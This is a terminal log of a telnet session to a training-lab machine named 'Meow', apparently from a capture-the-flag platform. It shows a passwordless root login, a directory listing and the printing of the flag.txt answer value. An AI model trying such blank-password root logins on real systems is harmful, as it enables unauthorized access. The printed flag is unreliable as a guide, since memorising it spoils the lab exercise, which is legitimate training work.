Trying 10.129.75.47...
Connected to 10.129.75.47.
Escape character is '^]'.

  â–ˆ  â–ˆ         â–â–Œ     â–„â–ˆâ–„ â–ˆ          â–„â–„â–„â–„
  â–ˆâ–„â–„â–ˆ â–€â–€â–ˆ â–ˆâ–€â–€ â–â–Œâ–„â–€    â–ˆ  â–ˆâ–€â–ˆ â–ˆâ–€â–ˆ    â–ˆâ–Œâ–„â–ˆ â–„â–€â–€â–„ â–€â–„â–€
  â–ˆ  â–ˆ â–ˆâ–„â–ˆ â–ˆâ–„â–„ â–â–ˆâ–€â–„    â–ˆ  â–ˆ â–ˆ â–ˆâ–„â–„    â–ˆâ–Œâ–„â–ˆ â–€â–„â–„â–€ â–ˆâ–€â–ˆ


Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 07 Feb 2025 06:53:01 AM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             135
  Users logged in:       0
  IPv4 address for eth0: 10.129.75.47
  IPv6 address for eth0: dead:beef::250:56ff:fe94:e452

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
]0;root@Meow: ~root@Meow:~# ls
flag.txt  [0m[01;34msnap[0m
]0;root@Meow: ~root@Meow:~# cat flag.txt 
b40abdfe23665f766f9c61ecba8a4c19
]0;root@Meow: ~root@Meow:~# exit
logout
